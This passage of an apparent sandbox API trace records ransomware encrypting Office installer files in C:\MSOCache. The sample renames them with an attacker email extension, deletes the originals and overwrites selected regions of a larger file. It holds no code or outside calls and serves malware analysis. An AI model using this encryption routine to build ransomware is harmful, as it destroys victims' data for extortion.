dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4 [0047.557] GetFileSizeEx (in: hFile=0x1f4, lpFileSize=0x375ff1c | out: lpFileSize=0x375ff1c*=868864) returned 1 [0047.557] CloseHandle (hObject=0x1f4) returned 1 [0047.558] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.msi")) returned 0x2020 [0047.558] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.msi.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0047.558] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4 [0047.558] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.558] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.558] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.msi.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0047.558] GetLastError () returned 0x0 [0047.558] ReadFile (in: hFile=0x1f4, lpBuffer=0x3de0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x375fed4, lpOverlapped=0x0 | out: lpBuffer=0x3de0020*, lpNumberOfBytesRead=0x375fed4*=0xd4200, lpOverlapped=0x0) returned 1 [0047.575] WriteFile (in: hFile=0x178, lpBuffer=0x3de0020*, nNumberOfBytesToWrite=0xd4210, lpNumberOfBytesWritten=0x375fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3de0020*, lpNumberOfBytesWritten=0x375fc9c*=0xd4210, lpOverlapped=0x0) returned 1 [0047.588] ReadFile (in: hFile=0x1f4, lpBuffer=0x3de0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x375fed4, lpOverlapped=0x0 | out: lpBuffer=0x3de0020*, lpNumberOfBytesRead=0x375fed4*=0x0, lpOverlapped=0x0) returned 1 [0047.588] WriteFile (in: hFile=0x178, lpBuffer=0x3de0020*, nNumberOfBytesToWrite=0xf4, lpNumberOfBytesWritten=0x375fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3de0020*, lpNumberOfBytesWritten=0x375fc9c*=0xf4, lpOverlapped=0x0) returned 1 [0047.588] SetEndOfFile (hFile=0x178) returned 1 [0047.588] CloseHandle (hObject=0x178) returned 1 [0047.589] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.589] SetEndOfFile (hFile=0x1f4) returned 1 [0047.767] CloseHandle (hObject=0x1f4) returned 1 [0047.767] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x2020) returned 1 [0047.767] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.msi")) returned 1 [0047.767] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi") returned 79 [0047.767] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi") returned 79 [0047.767] lstrlenW (lpString=".doc") returned 4 [0047.767] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0047.767] lstrlenW (lpString=".docx") returned 5 [0047.767] lstrcmpiW (lpString1=".docx", lpString2="t.msi") returned -1 [0047.767] lstrlenW (lpString=".pdf") returned 4 [0047.767] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0047.767] lstrlenW (lpString=".xls") returned 4 [0047.767] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0047.767] lstrlenW (lpString=".xlsx") returned 5 [0047.767] lstrcmpiW (lpString1=".xlsx", lpString2="t.msi") returned -1 [0047.767] lstrlenW (lpString=".ppt") returned 4 [0047.767] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0047.767] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi") returned 79 [0047.767] lstrlenW (lpString=".zip") returned 4 [0047.768] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0047.768] lstrlenW (lpString=".rar") returned 4 [0047.768] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0047.768] lstrlenW (lpString=".bz2") returned 4 [0047.768] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0047.768] lstrlenW (lpString=".7z") returned 3 [0047.768] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0047.768] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi") returned 79 [0047.768] lstrlenW (lpString=".dbf") returned 4 [0047.768] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0047.768] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi") returned 79 [0047.768] lstrlenW (lpString=".1cd") returned 4 [0047.768] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0047.768] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi") returned 79 [0047.768] lstrlenW (lpString=".jpg") returned 4 [0047.768] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0047.768] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi") returned 79 [0047.768] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi") returned 79 [0047.768] lstrlenW (lpString=".doc") returned 4 [0047.768] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0047.768] lstrlenW (lpString=".docx") returned 5 [0047.768] lstrcmpiW (lpString1=".docx", lpString2="t.msi") returned -1 [0047.768] lstrlenW (lpString=".pdf") returned 4 [0047.768] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0047.768] lstrlenW (lpString=".xls") returned 4 [0047.768] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0047.768] lstrlenW (lpString=".xlsx") returned 5 [0047.768] lstrcmpiW (lpString1=".xlsx", lpString2="t.msi") returned -1 [0047.768] lstrlenW (lpString=".ppt") returned 4 [0047.768] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0047.768] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi") returned 79 [0047.768] lstrlenW (lpString=".zip") returned 4 [0047.768] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0047.768] lstrlenW (lpString=".rar") returned 4 [0047.768] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0047.768] lstrlenW (lpString=".bz2") returned 4 [0047.769] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0047.769] lstrlenW (lpString=".7z") returned 3 [0047.769] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0047.769] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi") returned 79 [0047.769] lstrlenW (lpString=".dbf") returned 4 [0047.769] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0047.769] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi") returned 79 [0047.769] lstrlenW (lpString=".1cd") returned 4 [0047.769] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0047.769] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi") returned 79 [0047.769] lstrlenW (lpString=".jpg") returned 4 [0047.769] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0047.769] lstrcmpiW (lpString1=".msi", lpString2=".USA") returned -1 [0047.769] lstrlenW (lpString="AccessMUISet.msi") returned 16 [0047.769] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4 [0047.769] GetFileSizeEx (in: hFile=0x1f4, lpFileSize=0x375ff1c | out: lpFileSize=0x375ff1c*=868864) returned 1 [0047.769] CloseHandle (hObject=0x1f4) returned 1 [0047.769] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.msi")) returned 0x2020 [0047.769] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.msi.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0047.770] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4 [0047.770] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.770] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.770] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.msi.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0047.770] GetLastError () returned 0x0 [0047.770] ReadFile (in: hFile=0x1f4, lpBuffer=0x3de0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x375fed4, lpOverlapped=0x0 | out: lpBuffer=0x3de0020*, lpNumberOfBytesRead=0x375fed4*=0xd4200, lpOverlapped=0x0) returned 1 [0047.787] WriteFile (in: hFile=0x204, lpBuffer=0x3de0020*, nNumberOfBytesToWrite=0xd4210, lpNumberOfBytesWritten=0x375fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3de0020*, lpNumberOfBytesWritten=0x375fc9c*=0xd4210, lpOverlapped=0x0) returned 1 [0047.801] ReadFile (in: hFile=0x1f4, lpBuffer=0x3de0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x375fed4, lpOverlapped=0x0 | out: lpBuffer=0x3de0020*, lpNumberOfBytesRead=0x375fed4*=0x0, lpOverlapped=0x0) returned 1 [0047.802] WriteFile (in: hFile=0x204, lpBuffer=0x3de0020*, nNumberOfBytesToWrite=0xf4, lpNumberOfBytesWritten=0x375fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3de0020*, lpNumberOfBytesWritten=0x375fc9c*=0xf4, lpOverlapped=0x0) returned 1 [0047.802] SetEndOfFile (hFile=0x204) returned 1 [0047.802] CloseHandle (hObject=0x204) returned 1 [0047.802] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.802] SetEndOfFile (hFile=0x1f4) returned 1 [0047.809] CloseHandle (hObject=0x1f4) returned 1 [0047.809] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x2020) returned 1 [0047.809] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.msi")) returned 1 [0047.809] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi") returned 79 [0047.809] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi") returned 79 [0047.809] lstrlenW (lpString=".doc") returned 4 [0047.809] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0047.809] lstrlenW (lpString=".docx") returned 5 [0047.809] lstrcmpiW (lpString1=".docx", lpString2="t.msi") returned -1 [0047.809] lstrlenW (lpString=".pdf") returned 4 [0047.809] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0047.809] lstrlenW (lpString=".xls") returned 4 [0047.809] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0047.809] lstrlenW (lpString=".xlsx") returned 5 [0047.810] lstrcmpiW (lpString1=".xlsx", lpString2="t.msi") returned -1 [0047.810] lstrlenW (lpString=".ppt") returned 4 [0047.810] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0047.810] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi") returned 79 [0047.810] lstrlenW (lpString=".zip") returned 4 [0047.810] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0047.810] lstrlenW (lpString=".rar") returned 4 [0047.810] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0047.810] lstrlenW (lpString=".bz2") returned 4 [0047.810] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0047.810] lstrlenW (lpString=".7z") returned 3 [0047.810] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0047.810] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi") returned 79 [0047.810] lstrlenW (lpString=".dbf") returned 4 [0047.810] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0047.810] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi") returned 79 [0047.810] lstrlenW (lpString=".1cd") returned 4 [0047.810] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0047.810] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi") returned 79 [0047.810] lstrlenW (lpString=".jpg") returned 4 [0047.810] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0047.810] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi") returned 79 [0047.810] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi") returned 79 [0047.810] lstrlenW (lpString=".doc") returned 4 [0047.810] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0047.810] lstrlenW (lpString=".docx") returned 5 [0047.810] lstrcmpiW (lpString1=".docx", lpString2="t.msi") returned -1 [0047.810] lstrlenW (lpString=".pdf") returned 4 [0047.810] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0047.810] lstrlenW (lpString=".xls") returned 4 [0047.810] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0047.810] lstrlenW (lpString=".xlsx") returned 5 [0047.810] lstrcmpiW (lpString1=".xlsx", lpString2="t.msi") returned -1 [0047.810] lstrlenW (lpString=".ppt") returned 4 [0047.811] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0047.811] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi") returned 79 [0047.811] lstrlenW (lpString=".zip") returned 4 [0047.811] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0047.811] lstrlenW (lpString=".rar") returned 4 [0047.811] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0047.811] lstrlenW (lpString=".bz2") returned 4 [0047.811] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0047.811] lstrlenW (lpString=".7z") returned 3 [0047.811] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0047.811] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi") returned 79 [0047.811] lstrlenW (lpString=".dbf") returned 4 [0047.811] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0047.811] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi") returned 79 [0047.811] lstrlenW (lpString=".1cd") returned 4 [0047.811] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0047.811] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi") returned 79 [0047.811] lstrlenW (lpString=".jpg") returned 4 [0047.811] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0047.811] lstrcmpiW (lpString1=".msi", lpString2=".USA") returned -1 [0047.811] lstrlenW (lpString="Office32WW.msi") returned 14 [0047.811] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4 [0047.811] GetFileSizeEx (in: hFile=0x1f4, lpFileSize=0x375ff1c | out: lpFileSize=0x375ff1c*=1992192) returned 1 [0047.812] CloseHandle (hObject=0x1f4) returned 1 [0047.812] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.msi")) returned 0x2020 [0047.812] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.msi.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0047.812] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.msi"), lpNewFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.msi.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 1 [0047.812] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.msi.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4 [0047.812] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fc6c | out: lpNewFilePointer=0x0) returned 1 [0047.812] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fc2c | out: lpNewFilePointer=0x0) returned 1 [0047.812] ReadFile (in: hFile=0x1f4, lpBuffer=0x3de0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x375fc38, lpOverlapped=0x0 | out: lpBuffer=0x3de0058*, lpNumberOfBytesRead=0x375fc38*=0x40000, lpOverlapped=0x0) returned 1 [0047.826] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0xa2200, lpNewFilePointer=0x0, dwMoveMethod=0x375fc2c | out: lpNewFilePointer=0x0) returned 1 [0047.826] ReadFile (in: hFile=0x1f4, lpBuffer=0x3e20058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x375fc38, lpOverlapped=0x0 | out: lpBuffer=0x3e20058*, lpNumberOfBytesRead=0x375fc38*=0x40000, lpOverlapped=0x0) returned 1 [0047.833] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x375fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0047.834] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x1a6600, lpNewFilePointer=0x0, dwMoveMethod=0x375fc2c | out: lpNewFilePointer=0x0) returned 1 [0047.834] ReadFile (in: hFile=0x1f4, lpBuffer=0x3e60058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x375fc38, lpOverlapped=0x0 | out: lpBuffer=0x3e60058*, lpNumberOfBytesRead=0x375fc38*=0x40000, lpOverlapped=0x0) returned 1 [0047.847] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.847] WriteFile (in: hFile=0x1f4, lpBuffer=0x3de0020*, nNumberOfBytesToWrite=0xc0108, lpNumberOfBytesWritten=0x375fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3de0020*, lpNumberOfBytesWritten=0x375fcb0*=0xc0108, lpOverlapped=0x0) returned 1 [0048.464] SetEndOfFile (hFile=0x1f4) returned 1 [0048.464] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x40000) returned 0x40270d8 [0048.679] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fc7c | out: lpNewFilePointer=0x0) returned 1 [0048.679] WriteFile (in: hFile=0x1f4, lpBuffer=0x40270d8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x375fc88, lpOverlapped=0x0 | out: lpBuffer=0x40270d8*, lpNumberOfBytesWritten=0x375fc88*=0x40000, lpOverlapped=0x0) returned 1 [0048.680] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0xa2200, lpNewFilePointer=0x0, dwMoveMethod=0x375fc7c | out: lpNewFilePointer=0x0) returned 1 [0048.680] WriteFile (in: hFile=0x1f4, lpBuffer=0x40270d8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x375fc88, lpOverlapped=0x0 | out: lpBuffer=0x40270d8*, lpNumberOfBytesWritten=0x375fc88*=0x40000, lpOverlapped=0x0) returned 1 [0048.683] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x1a6600, lpNewFilePointer=0x0, dwMoveMethod=0x375fc7c | out: lpNewFilePointer=0x0) returned 1 [0048.684] WriteFile (in: hFile=0x1f4, lpBuffer=0x40270d8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x375fc88, lpOverlapped=0x0 | out: lpBuffer=0x40270d8*, lpNumberOfBytesWritten=0x375fc88*=0x40000, lpOverlapped=0x0) returned 1 [0048.686] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x40270d8 | out: hHeap=0x5d0000) returned 1 [0048.686] CloseHandle (hObject=0x1f4) returned 1 [0048.686] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x2020) returned 1 [0048.686] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0048.686] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0048.686] lstrlenW (lpString=".doc") returned 4 [0048.686] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0048.686] lstrlenW (lpString=".docx") returned 5 [0048.686] lstrcmpiW (lpString1=".docx", lpString2="W.msi") returned -1 [0048.686] lstrlenW (lpString=".pdf") returned 4 [0048.686] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0048.686] lstrlenW (lpString=".xls") returned 4 [0048.686] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0048.686] lstrlenW (lpString=".xlsx") returned 5 [0048.686] lstrcmpiW (lpString1=".xlsx", lpString2="W.msi") returned -1 [0048.687] lstrlenW (lpString=".ppt") returned 4 [0048.687] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0048.687] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0048.687] lstrlenW (lpString=".zip") returned 4 [0048.687] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0048.687] lstrlenW (lpString=".rar") returned 4 [0048.687] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0048.687] lstrlenW (lpString=".bz2") returned 4 [0048.687] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0048.687] lstrlenW (lpString=".7z") returned 3 [0048.687] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0048.687] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0048.687] lstrlenW (lpString=".dbf") returned 4 [0048.687] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0048.687] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0048.687] lstrlenW (lpString=".1cd") returned 4 [0048.687] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0048.687] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0048.687] lstrlenW (lpString=".jpg") returned 4 [0048.687] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0048.687] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0048.687] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0048.687] lstrlenW (lpString=".doc") returned 4 